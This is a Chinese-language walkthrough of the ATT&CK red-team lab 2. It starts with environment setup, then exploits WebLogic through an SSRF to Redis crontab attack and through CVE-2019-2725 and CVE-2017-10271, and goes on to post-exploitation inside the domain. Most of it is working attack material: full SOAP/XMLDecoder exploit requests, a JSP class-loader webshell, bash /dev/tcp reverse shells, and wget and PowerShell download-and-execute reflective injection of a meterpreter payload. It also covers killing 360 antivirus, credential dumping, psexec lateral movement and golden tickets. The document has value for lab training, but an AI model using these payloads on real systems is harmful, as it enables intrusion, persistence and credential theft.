ATT&CK(二)

环境搭建

image-20220621212604899

image-20220621211934837

image-20220621174709058

image-20220621174735862

image-20220621174806003

image-20220621181131929

image-20220621195106952

还原一下快照

image-20220625174145381

image-20220625174211710

image-20220625174230020

登录web主机 使用密码 de1ay 1qaz@WSX登录进去

进去之后进到这个目录下面,无权限时可以输入 管理员账号密码:Administrator/1qaz@WSX

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

以管理员身份运行

image-20220621200408282

WEB机和PC机:计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动(Computer Browser 一直自动关闭导致 net view 显示 6118 error 没能解决,在域信息收集时暂时关闭一下防火墙)

image-20220621211420995

image-20220621212820539

信息收集

收集ip

nmap -sP 192.168.111.2/24

image-20220621214555671

收集80的具体信息

nmap -sS -sV -A -T4 -p- 192.168.111.80

image-20220621221700966

  • 445端口开放可能存在smb服务可能还会有ms17-010 端口溢出漏洞
  • 139端口开放就存在有samba服务可能会有远程命令执行漏洞
  • 1433端口开放就存在mssql服务有可能存在爆破 注入 sa弱口令
  • 3389远程桌面服务
  • 7001端口 weblogic服务

外网

https://github.com/dr0op/WeblogicScan

image-20220622114731263

weblogic SSRF

简单测试

cd vulhub/weblogic/ssrf/
docker-compose up -d
docker ps

可以看到开启了连个服务 一个是weblogic 另一个是 redis

image-20220622124555507

同样我们先扫描一下

image-20220622124923529

image-20220622125038532

我们对operator进行修改操作,发现当端口开放的时候会返回404

image-20220622125129137

当端口不存在的时候就会显示服务连接不上

image-20220622125218085

师傅总结的五种状态

状态一

img

状态二

img

状态三

img

状态四

img

状态五

img

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),发现172.18.0.2:6379可以连通

image-20220622125917419

定时任务payload

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.111.128/7777 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

image-20220622131542850

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F7777%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave

替换%0A为%0A%0D

strs = """set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F7777%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave"""
print(strs.replace("%0A","%0A%0D"))

在拼接到redis请求之中

http://172.18.0.2:6379/ww%0A%0D%0A%0Dset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F7777%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0A%0Dconfig%20set%20dir%20%2Fetc%2F%0A%0Dconfig%20set%20dbfilename%20crontab%0A%0Dsave

image-20220622132138045

image-20220622132202804

调试分析

修改docker-compose.yml,增加8888端口映射

vim docker-compose.yml

image-20220622155709763

重启docker

docker stop `docker ps -q`
docker-compose up -d

查看id

docker ps

进入容器

docker exec -it 5891c1ca1078  bash
cd /root/Oracle/Middleware/user_projects/domains/base_domain/bin
vi setDomainEnv.sh

debugFlag="true"
export debugFlag
DEBUG_PORT=8888

image-20220622155838105

重新启动容器

docker restart 5891c1ca1078

获取weblogic的源码

docker cp 5891c1ca1078:/root ./weblogic_jars

将所有jar包放到一个目录下面

mkdir weblogic_jars/lib
find ./weblogic_jars -name *.jar -exec cp {} ./weblogic_jars/lib/ \;

image-20220622140141533

idea打开下面的wlserver_10.3

image-20220622161415686

添加jar包

image-20220622164819665

添加 jdk

image-20220622164833443

image-20220622142311237

如果不行就把防护墙关了

这里呢我们要找到正确调试的位置要在反编译的class下面下断点.我们先去看看要调试那个class文件

查看一个docker的日志

docker logs 5891c1ca1078

image-20220622220616949

我们找到然后下好断点

image-20220622220701038

成功接收到了

image-20220622220715115

这里调试主要关注点是对于operator参数值的传递 从sendMessage函数开始,这里sendMessage接收到operator的参数值

image-20220622222722228

sendMessage函数中利用BindFactory创建了一个工厂类,又创建了一个BindingInfo对象

image-20220622222631550

工厂类会通过BindingInfo的内容来决定创建的Bind对象的类型

image-20220622222754823

这里BindingInfo的getTransport函数默认为http11

image-20220622222901602

最后工厂类创建的对象为Http11ClientBinding

image-20220622222950769

通过Http11ClientBinding调用send函数来发起请求,这里可以看出直接向url参数中的地址发起连接,没有进行任何的校验。所以存在CRLF的问题

image-20220622223024558

weblogic CVE-2019-2725

环境搭建

下载jdk

https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html#jdk-7u80-oth-JPR

image-20220623085424691

下载weblogic

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

image-20220623091043572

上传上去

image-20220623090247680

tar -zxvf jdk-7u80-linux-x64.tar.gz 
解压

image-20220623090333153

记一下解压后的文件名 jdk1.7.0_80

export JAVA_HOME=/usr/lib/jvm/jdk1.7.0_80
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH
sudo vim ~/.bashrc

image-20220623090623413

reboot
重启一下

image-20220623090903937

说明环境配好了

image-20220623091646101

命令行安装

java -jar wls1036_generic.jar -mode=console

image-20220623091729860

image-20220623091805277

image-20220623091838685

image-20220623091906698

cd /root/Oracle/Middleware/wlserver_10.3/common/bin/

image-20220623092200879

image-20220623092128399

image-20220623092416513

image-20220623092615763

修改完之后要输入下一步

image-20220623093250269

image-20220623093431477

image-20220623093507139

cd /root/Oracle/Middleware/wlserver_10.3/common/lib/n/wanan
./startWebLogic.sh

image-20220623093931310

image-20220623094042195

http://192.168.111.129:7001/_async/AsyncResponseService

访问这个目录若返回200表示漏洞存在如果返回404则不存在

image-20220623094235776

http://192.168.111.129:7001/_async/

访问这个目录若返回403表示漏洞存在,如果返回404表示漏洞不存在

image-20220623094322773

利用前可以先看下有无wget命令

image-20220623102922964

<%!
class U extends ClassLoader{
// 定义一个U class继承ClassLoader
U(ClassLoader c){
super(c);
}
// 调用父类的初始化
public Class g(byte[] b){
return super.defineClass(b,0, b.length);
// 调用父类的defineClass将得到的字节流数组传进入
}
}

public byte[] base64Decode(String str) throws Exception{
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object getDecoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) getDecoder.getClass().getMethod("decode",String.class).invoke(getDecoder,str);
}
// 通过两种方法进行base64解码


}

%>
<%
String cls = request.getParameter("wanan");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>

查看一下写到哪里/_async/AsyncResponseService?info

image-20220623103218247

访问/_async/_async/AsyncResponseService

image-20220623102726482

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.129:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 851
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://192.168.111.1/wanan.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/wan.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>


image-20220623103936008

蚁剑连接一下

image-20220623104050830

image-20220623104121037

反弹shell

bash -i >& /dev/tcp/target ip/target port 0>&1
这里>&需要转换,否则无法利用
例:
bash -i &gt;&amp; /dev/tcp/192.168.111.128/7777 0&gt;&amp;1

image-20220623105523532

image-20220623105557553

weblogic CVE-2017-10271

要跟上一个环境分开的话就重启一下

reboot
cd /root/vulnhub/weblogic/CVE-2017-10271/
vim docker-compose.yml

image-20220623111549936

image-20220623111825081

cd /root/Oracle/Middleware/user_projects/domains/base_domain/bin
vi setDomainEnv.sh

debugFlag="true"
export debugFlag
DEBUG_PORT=8888

image-20220623112118921

docker cp 51bde427044b:/root ./weblogic_jars
mkdir weblogic_jars/10271
find ./weblogic_jars -name *.jar -exec cp {} ./weblogic_jars/10271/ \;

打开wlserver_10.3

image-20220623123036029

image-20220623123128519

image-20220623123144978

image-20220623123228744

打个断点

image-20220623123413445

http://192.168.111.129:7001/wls-wsat/CoordinatorPortType

image-20220623123451668

访问这个路径 显示以下页面可能存在漏洞

image-20220623123531229

下面的也可以尝试

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

image-20220623123921048

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.111.129:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 641

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.111.128/7777 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

image-20220623124444735

image-20220623130255437

image-20220623131747359

VE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType post数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

在weblogic/wsee/jaxws/workcontext/WorkContextServerTube类的processRequest方法中,处理POST数据包中的XML数据。var1即是传入的xml数据

image-20220623133423937

到readHeaderOld方法中,处理读取的xml

image-20220623134333236

前面获取了xml,使用ByteArrayOutputStream转换成了字节流赋值给var4,然后调用了WorkContextXmlInputAdapter传入了var4

image-20220623135647500

image-20220623135629181

image-20220623135934223

image-20220623135954784

继续跟进几个方法后,到了WorkContextLocalMap#receiveRequest,165行调用了WorkContextEntryImpl的readEntry方法

image-20220623140131705

image-20220623140927455

跟进readUTF,在这里进行了xmlDecoder.readObject触发了xmlDecoder的反序列化,执行了ProcessBuilder.start()

image-20220623141023945

利用CVE-2019-2725写shell

image-20220624213014858

把shell写到images目录中

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\wan.jsp

image-20220624213517728

http://192.168.111.80:7001/console/framework/skins/wlsconsole/images/wan.jsp

image-20220624213730822

内网

下载PowerSploit

git clone https://github.com/PowerShellMafia/PowerSploit.git

生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.111.80 lport=4444 -o ./shell.exe

转换成base64

cat shell.exe | base64 >base64.txt

开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.128
set lport 4444
run

python起一个网络服务

python3 -m http.server

image-20220625130255870

远程加载powershell的pe反射模块

iex(New-Object Net.WebClient).DownloadString("http://192.168.111.128:8000/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1")

继续加载base64编码后的payload,赋值给一个变量

$b64Str = (New-Object Net.WebClient).DownloadString("http://192.168.111.128:8000/base64.txt")

靶机解码payload

$PEBytes = [System.Convert]::FromBase64String($b64Str)

反射调用

Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR

把上面的写成脚本 wan.ps1

iex(New-Object Net.WebClient).DownloadString("http://192.168.111.128:8000/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1");  $b64Str = (New-Object Net.WebClient).DownloadString("http://192.168.111.128:8000/base64.txt") ;  $PEBytes = [System.Convert]::FromBase64String($b64Str) ;  Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR

image-20220625144402385

image-20220625144512779

powershell -ExecutionPolicy Bypass -File C:/Windows/wan.ps1

弹不上来 但是本地尝试可以

换种方法

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.111.128
set lport 5555
run

image-20220625155243987

image-20220625155247879

image-20220625155328294

image-20220625155656797

image-20220625155702197

输出的东西都一样还是弹不上来

在换一种方式

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.111.128
set rhosts 192.168.111.80
set target Windows
run

image-20220625160229665

迁移进程

ps -ef | grep svchost.exe
migrate 632

image-20220625160748261

成功获取到system权限

查看杀软

image-20220625161308277

尝试杀一下

ps | grep 360

image-20220625161331044

虽然杀了但是又重启了

我们尝试出入360的主动防御

image-20220625161446555

image-20220625161612262

我还没杀就自己没了?

image-20220625161745885

我们在把主动防御杀了.先迁移回去

image-20220625161935697

可以看到360确实被我们干死了

image-20220625162104373

派生给cs

use windows/local/payload_inject
set disablepayloadhandler true
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129 #teamserver 地址
set lport 5555 #非会话监听地址
set session 3 #会话session id
exploit

image-20220625170351784

看一下上面一样就好

image-20220625170402737

成功接收到会话

image-20220625170428942

抓密码

image-20220625171155271

收集一下信息 在一里面命令挺全的了,这里就拿重要的来了

shell ipconfig/all

image-20220625171511419

双网卡

image-20220625171609965

域下信息收集不到的话,就去全部换原一下快照

net view 

image-20220625175626891

shell net user /domain

image-20220625174503902

shell net group "domain controllers" /domain
查看域控制器

image-20220625174704887

shell net group "domain computers" /domain
查看当前域成员计算机列表

image-20220625174726630

psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。

利用 psexec 横向移动至DC,域控成功上线。

image-20220625175107684

image-20220625175650424

image-20220625175835768

成功上线

image-20220625175851210

权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID

hashdump

image-20220625180929543

logonpasswords

image-20220625182804854

黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据,TGT仅用于向域服务器上的密钥分配中心(KDC)证明用户已经被其他的域控制器认证

黄金票据的条件

  1. 域名城
  2. 域的sid值
  3. 域的krbtgt账户htlm密码哈希
  4. 伪造用户名

黄金票据可以在拥有普通域用户权限和krbtgt账户的hash的情况下用来获取域管理员权限,上面已经获取了域控的system权限了,还可以使用黄金票据做权限维持,当域控制器权限掉了之后,在通过域内其他任意机器伪造票据重新湖区最高权限

image-20220625182848364

image-20220625182904696